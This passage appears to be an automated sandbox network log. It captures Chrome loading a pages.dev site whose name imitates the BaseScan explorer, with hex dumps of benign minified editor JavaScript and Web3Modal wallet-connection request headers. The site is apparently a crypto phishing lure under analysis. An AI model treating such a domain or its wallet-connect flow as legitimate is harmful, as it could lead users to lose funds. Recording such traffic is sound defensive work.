                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC496INData Raw: 33 39 36 34 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 76 61 72 20 69 3d 65 3b 6e 26 26 28 65 5b 6e 5d 7c 7c 28 65 5b 6e 5d 3d 7b 7d 29 2c 69 3d 65 5b 6e 5d 29 3b 69 66 28 21 69 2e 64 65 66 69 6e 65 7c 7c 21 69 2e 64 65 66 69 6e 65 2e 70 61 63 6b 61 67 65 64 29 74 2e 6f 72 69 67 69 6e 61 6c 3d 69 2e 64 65 66 69 6e 65 2c 69 2e 64 65 66 69 6e 65 3d 74 2c 69 2e 64 65 66 69 6e 65 2e 70 61 63 6b 61 67 65 64 3d 21 30 3b 69 66 28 21 69 2e 72 65 71 75 69 72 65 7c 7c 21 69 2e 72 65 71 75 69 72 65 2e 70 61 63 6b 61 67 65 64 29 72 2e 6f 72 69 67 69 6e 61 6c 3d 69 2e 72 65 71 75 69 72 65 2c 69 2e 72 65 71 75 69 72 65 3d 72 2c 69 2e 72 65 71 75 69 72 65 2e 70 61 63 6b 61 67 65 64 3d 21 30 7d 76 61 72 20 41 43 45 5f 4e 41 4d 45
                                                                                                                                                                                                                                              Data Ascii: 3964(function(){function o(n){var i=e;n&&(e[n]||(e[n]={}),i=e[n]);if(!i.define||!i.define.packaged)t.original=i.define,i.define=t,i.define.packaged=!0;if(!i.require||!i.require.packaged)r.original=i.require,i.require=r,i.require.packaged=!0}var ACE_NAME
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 64 72 6f 70 70 69 6e 67 20 6d 6f 64 75 6c 65 20 62 65 63 61 75 73 65 20 64 65 66 69 6e 65 20 77 61 73 6e 27 74 20 61 20 73 74 72 69 6e 67 2e 22 29 2c 63 6f 6e 73 6f 6c 65 2e 74 72 61 63 65 28 29 29 3b 72 65 74 75 72 6e 7d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3d 3d 32 26 26 28 72 3d 6e 29 2c 74 2e 6d 6f 64 75 6c 65 73 5b 65 5d 7c 7c 28 74 2e 70 61 79 6c 6f 61 64 73 5b 65 5d 3d 72 2c 74 2e 6d 6f 64 75 6c 65 73 5b 65 5d 3d 6e 75 6c 6c 29 7d 3b 74 2e 6d 6f 64 75 6c 65 73 3d 7b 7d 2c 74 2e 70 61 79 6c 6f 61 64 73 3d 7b 7d 3b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 20 74 3d 3d 22 73 74 72 69 6e 67 22 29 7b 76 61 72 20 69 3d 73 28 65 2c 74 29 3b 69 66 28 69 21 3d 75 6e 64 65 66 69 6e 65 64 29 72 65
                                                                                                                                                                                                                                              Data Ascii: dropping module because define wasn't a string."),console.trace());return}arguments.length==2&&(r=n),t.modules[e]||(t.payloads[e]=r,t.modules[e]=null)};t.modules={},t.payloads={};var n=function(e,t,n){if(typeof t=="string"){var i=s(e,t);if(i!=undefined)re
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 74 2c 6e 29 3b 66 6f 72 28 76 61 72 20 72 3d 6e 7c 7c 30 3b 72 3c 65 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 69 66 28 65 5b 72 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 72 3b 72 65 74 75 72 6e 2d 31 7d 76 61 72 20 72 3d 7b 65 78 65 63 3a 52 65 67 45 78 70 2e 70 72 6f 74 6f 74 79 70 65 2e 65 78 65 63 2c 74 65 73 74 3a 52 65 67 45 78 70 2e 70 72 6f 74 6f 74 79 70 65 2e 74 65 73 74 2c 6d 61 74 63 68 3a 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 74 63 68 2c 72 65 70 6c 61 63 65 3a 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 70 6c 61 63 65 2c 73 70 6c 69 74 3a 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 70 6c 69 74 7d 2c 69 3d 72 2e 65 78 65 63 2e 63 61 6c 6c 28 2f 28 29 3f 3f 2f 2c 22
                                                                                                                                                                                                                                              Data Ascii: turn e.indexOf(t,n);for(var r=n||0;r<e.length;r++)if(e[r]===t)return r;return-1}var r={exec:RegExp.prototype.exec,test:RegExp.prototype.test,match:String.prototype.match,replace:String.prototype.replace,split:String.prototype.split},i=r.exec.call(/()??/,"
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 22 7c 7c 74 3d 3d 3d 22 6e 75 6d 62 65 72 22 7c 7c 74 3d 3d 3d 22 73 74 72 69 6e 67 22 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 65 29 7b 76 61 72 20 74 2c 6e 2c 72 3b 69 66 28 42 28 65 29 29 72 65 74 75 72 6e 20 65 3b 6e 3d 65 2e 76 61 6c 75 65 4f 66 3b 69 66 28 74 79 70 65 6f 66 20 6e 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 74 3d 6e 2e 63 61 6c 6c 28 65 29 3b 69 66 28 42 28 74 29 29 72 65 74 75 72 6e 20 74 7d 72 3d 65 2e 74 6f 53 74 72 69 6e 67 3b 69 66 28 74 79 70 65 6f 66 20 72 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 74 3d 72 2e 63 61 6c 6c 28 65 29 3b 69 66 28 42 28 74 29 29 72 65 74 75 72 6e 20 74 7d 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 7d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 6e 64 7c 7c 28 46 75 6e 63 74
                                                                                                                                                                                                                                              Data Ascii: "||t==="number"||t==="string"}function j(e){var t,n,r;if(B(e))return e;n=e.valueOf;if(typeof n=="function"){t=n.call(e);if(B(t))return t}r=e.toString;if(typeof r=="function"){t=r.call(e);if(B(t))return t}throw new TypeError}Function.prototype.bind||(Funct
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 74 68 69 73 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 68 69 73 2c 69 29 3b 65 6c 73 65 7b 76 61 72 20 6f 3d 4d 61 74 68 2e 6d 69 6e 28 74 2c 6e 2d 65 29 2c 61 3d 65 2b 6f 2c 66 3d 61 2b 73 2d 6f 2c 6c 3d 6e 2d 61 2c 63 3d 6e 2d 6f 3b 69 66 28 66 3c 61 29 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 6c 3b 2b 2b 68 29 74 68 69 73 5b 66 2b 68 5d 3d 74 68 69 73 5b 61 2b 68 5d 3b 65 6c 73 65 20 69 66 28 66 3e 61 29 66 6f 72 28 68 3d 6c 3b 68 2d 2d 3b 29 74 68 69 73 5b 66 2b 68 5d 3d 74 68 69 73 5b 61 2b 68 5d 3b 69 66 28 73 26 26 65 3d 3d 3d 63 29 74 68 69 73 2e 6c 65 6e 67 74 68 3d 63 2c 74 68 69 73 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 68 69 73 2c 69 29 3b 65 6c 73 65 7b 74 68 69 73 2e 6c 65 6e 67 74 68 3d 63 2b 73 3b 66 6f 72 28 68 3d 30 3b 68 3c 73 3b 2b 2b 68
                                                                                                                                                                                                                                              Data Ascii: this.push.apply(this,i);else{var o=Math.min(t,n-e),a=e+o,f=a+s-o,l=n-a,c=n-o;if(f<a)for(var h=0;h<l;++h)this[f+h]=this[a+h];else if(f>a)for(h=l;h--;)this[f+h]=this[a+h];if(s&&e===c)this.length=c,this.push.apply(this,i);else{this.length=c+s;for(h=0;h<s;++h
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 66 3d 30 3b 66 3c 69 3b 66 2b 2b 29 66 20 69 6e 20 72 26 26 28 6f 3d 72 5b 66 5d 2c 74 2e 63 61 6c 6c 28 75 2c 6f 2c 66 2c 6e 29 26 26 73 2e 70 75 73 68 28 6f 29 29 3b 72 65 74 75 72 6e 20 73 7d 29 2c 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 76 65 72 79 7c 7c 28 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 76 65 72 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 46 28 74 68 69 73 29 2c 72 3d 67 26 26 61 28 74 68 69 73 29 3d 3d 22 5b 6f 62 6a 65 63 74 20 53 74 72 69 6e 67 5d 22 3f 74 68 69 73 2e 73 70 6c 69 74 28 22 22 29 3a 6e 2c 69 3d 72 2e 6c 65 6e 67 74 68 3e 3e 3e 30 2c 73 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3b 69 66 28 61 28 74 29 21 3d 22 5b 6f 62 6a 65 63 74 20 46 75 6e 63 74 69 6f 6e 5d 22 29 74 68 72 6f 77 20 6e 65
                                                                                                                                                                                                                                              Data Ascii: f=0;f<i;f++)f in r&&(o=r[f],t.call(u,o,f,n)&&s.push(o));return s}),Array.prototype.every||(Array.prototype.every=function(t){var n=F(this),r=g&&a(this)=="[object String]"?this.split(""):n,i=r.length>>>0,s=arguments[1];if(a(t)!="[object Function]")throw ne
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 74 2b 22 20 69 73 20 6e 6f 74 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 21 69 26 26 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3d 3d 31 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 72 65 64 75 63 65 52 69 67 68 74 20 6f 66 20 65 6d 70 74 79 20 61 72 72 61 79 20 77 69 74 68 20 6e 6f 20 69 6e 69 74 69 61 6c 20 76 61 6c 75 65 22 29 3b 76 61 72 20 73 2c 6f 3d 69 2d 31 3b 69 66 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 3d 32 29 73 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3b 65 6c 73 65 20 64 6f 7b 69 66 28 6f 20 69 6e 20 72 29 7b 73 3d 72 5b 6f 2d 2d 5d 3b 62 72 65 61 6b 7d 69 66 28 2d 2d 6f 3c 30 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22
                                                                                                                                                                                                                                              Data Ascii: row new TypeError(t+" is not a function");if(!i&&arguments.length==1)throw new TypeError("reduceRight of empty array with no initial value");var s,o=i-1;if(arguments.length>=2)s=arguments[1];else do{if(o in r){s=r[o--];break}if(--o<0)throw new TypeError("
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 6e 29 29 72 65 74 75 72 6e 3b 76 61 72 20 72 2c 69 2c 73 3b 72 3d 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 3b 69 66 28 64 29 7b 76 61 72 20 75 3d 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3b 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 6f 3b 76 61 72 20 69 3d 68 28 74 2c 6e 29 2c 73 3d 70 28 74 2c 6e 29 3b 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 75 3b 69 66 28 69 7c 7c 73 29 72 65 74 75 72 6e 20 69 26 26 28 72 2e 67 65 74 3d 69 29 2c 73 26 26 28 72 2e 73 65 74 3d 73 29 2c 72 7d 72 65 74 75 72 6e 20 72 2e 76 61 6c 75 65 3d 74 5b 6e 5d 2c 72 7d 7d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 7c 7c 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 3d 66 75 6e 63 74
                                                                                                                                                                                                                                              Data Ascii: n))return;var r,i,s;r={enumerable:!0,configurable:!0};if(d){var u=t.__proto__;t.__proto__=o;var i=h(t,n),s=p(t,n);t.__proto__=u;if(i||s)return i&&(r.get=i),s&&(r.set=s),r}return r.value=t[n],r}}Object.getOwnPropertyNames||(Object.getOwnPropertyNames=funct
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 28 4f 62 6a 65 63 74 2c 74 2c 6e 2c 72 29 7d 63 61 74 63 68 28 69 29 7b 7d 69 66 28 66 28 72 2c 22 76 61 6c 75 65 22 29 29 69 66 28 64 26 26 28 68 28 74 2c 6e 29 7c 7c 70 28 74 2c 6e 29 29 29 7b 76 61 72 20 73 3d 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3b 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 6f 2c 64 65 6c 65 74 65 20 74 5b 6e 5d 2c 74 5b 6e 5d 3d 72 2e 76 61 6c 75 65 2c 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 7d 65 6c 73 65 20 74 5b 6e 5d 3d 72 2e 76 61 6c 75 65 3b 65 6c 73 65 7b 69 66 28 21 64 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 43 29 3b 66 28 72 2c 22 67 65 74 22 29 26 26 6c 28 74 2c 6e 2c 72 2e 67 65 74 29 2c 66 28 72 2c 22 73 65 74 22 29 26 26 63 28 74 2c 6e 2c 72 2e 73 65 74 29 7d 72 65 74 75 72 6e 20 74 7d 7d 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                              Data Ascii: (Object,t,n,r)}catch(i){}if(f(r,"value"))if(d&&(h(t,n)||p(t,n))){var s=t.__proto__;t.__proto__=o,delete t[n],t[n]=r.value,t.__proto__=s}else t[n]=r.value;else{if(!d)throw new TypeError(C);f(r,"get")&&l(t,n,r.get),f(r,"set")&&c(t,n,r.set)}return t}}Object.
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 41 5b 6e 5d 3b 66 28 65 2c 69 29 26 26 49 2e 70 75 73 68 28 69 29 7d 72 65 74 75 72 6e 20 49 7d 7d 44 61 74 65 2e 6e 6f 77 7c 7c 28 44 61 74 65 2e 6e 6f 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 7d 29 3b 76 61 72 20 5f 3d 22 09 5c 6e 0b 5c 66 5c 72 20 5c 75 30 30 61 30 5c 75 31 36 38 30 5c 75 31 38 30 65 5c 75 32 30 30 30 5c 75 32 30 30 31 5c 75 32 30 30 32 5c 75 32 30 30 33 5c 75 32 30 30 34 5c 75 32 30 30 35 5c 75 32 30 30 36 5c 75 32 30 30 37 5c 75 32 30 30 38 5c 75 32 30 30 39 5c 75 32 30 30 61 5c 75 32 30 32 66 5c 75 32 30 35 66 5c 75 33 30 30 30 5c 75 32 30 32 38 5c 75 32 30 32 39 5c 75 66 65 66 66 22 3b 69 66 28 21 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69
                                                                                                                                                                                                                                              Data Ascii: A[n];f(e,i)&&I.push(i)}return I}}Date.now||(Date.now=function(){return(new Date).getTime()});var _="\n\f\r \u00a0\u1680\u180e\u2000\u2001\u2002\u2003\u2004\u2005\u2006\u2007\u2008\u2009\u200a\u202f\u205f\u3000\u2028\u2029\ufeff";if(!String.prototype.tri


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              50192.168.2.549787104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC687OUTOPTIONS /public/getAssetImage/600a9a04-c1b9-42ca-6785-9b4b6ff85200 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Access-Control-Request-Method: GET
                                                                                                                                                                                                                                              Access-Control-Request-Headers: x-project-id,x-sdk-type,x-sdk-version
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC449INHTTP/1.1 204 Not Found
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Vary: Origin, Access-Control-Request-Headers
                                                                                                                                                                                                                                              Access-Control-Allow-Headers: x-project-id,x-sdk-version,x-sdk-type
                                                                                                                                                                                                                                              Access-Control-Allow-Methods: OPTIONS,GET,POST,PUT,PATCH,DELETE
                                                                                                                                                                                                                                              Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2cd9b0480d0-EWR


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              51192.168.2.549791104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC687OUTOPTIONS /public/getAssetImage/692ed6ba-e569-459a-556a-776476829e00 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Access-Control-Request-Method: GET
                                                                                                                                                                                                                                              Access-Control-Request-Headers: x-project-id,x-sdk-type,x-sdk-version
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC489INHTTP/1.1 204 Not Found
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Vary: Origin, Access-Control-Request-Headers
                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                              Access-Control-Allow-Headers: x-project-id,x-sdk-version,x-sdk-type
                                                                                                                                                                                                                                              Access-Control-Allow-Methods: OPTIONS,GET,POST,PUT,PATCH,DELETE
                                                                                                                                                                                                                                              Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2cd9b170f65-EWR


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              52192.168.2.549788104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC687OUTOPTIONS /public/getAssetImage/7289c336-3981-4081-c5f4-efc26ac64a00 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Access-Control-Request-Method: GET
                                                                                                                                                                                                                                              Access-Control-Request-Headers: x-project-id,x-sdk-type,x-sdk-version
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC519INHTTP/1.1 204 Not Found
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Vary: Origin, Access-Control-Request-Headers
                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                              Access-Control-Allow-Headers: x-project-id,x-sdk-version,x-sdk-type
                                                                                                                                                                                                                                              Access-Control-Allow-Methods: OPTIONS,GET,POST,PUT,PATCH,DELETE
                                                                                                                                                                                                                                              Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2cd9f6318b4-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              53192.168.2.549790104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC687OUTOPTIONS /public/getAssetImage/ef1a1fcf-7fe8-4d69-bd6d-fda1345b4400 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Access-Control-Request-Method: GET
                                                                                                                                                                                                                                              Access-Control-Request-Headers: x-project-id,x-sdk-type,x-sdk-version
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC489INHTTP/1.1 204 Not Found
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Vary: Origin, Access-Control-Request-Headers
                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                              Access-Control-Allow-Headers: x-project-id,x-sdk-version,x-sdk-type
                                                                                                                                                                                                                                              Access-Control-Allow-Methods: OPTIONS,GET,POST,PUT,PATCH,DELETE
                                                                                                                                                                                                                                              Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2cd9c445e6e-EWR


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              54192.168.2.549792104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC687OUTOPTIONS /public/getAssetImage/0c2840c3-5b04-4c44-9661-fbd4b49e1800 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Access-Control-Request-Method: GET
                                                                                                                                                                                                                                              Access-Control-Request-Headers: x-project-id,x-sdk-type,x-sdk-version
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC489INHTTP/1.1 204 Not Found
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Vary: Origin, Access-Control-Request-Headers
                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                              Access-Control-Allow-Headers: x-project-id,x-sdk-version,x-sdk-type
                                                                                                                                                                                                                                              Access-Control-Allow-Methods: OPTIONS,GET,POST,PUT,PATCH,DELETE
                                                                                                                                                                                                                                              Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2cd9b180f65-EWR


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              55192.168.2.549789104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC806OUTGET /public/getAssetImage/93564157-2e8e-4ce7-81df-b264dbee9b00 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              x-sdk-version: html-ethers5-3.2.1
                                                                                                                                                                                                                                              x-sdk-type: w3m
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              x-project-id: 9a504add1206ecb902aee52264862b81
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC781INHTTP/1.1 200 OK
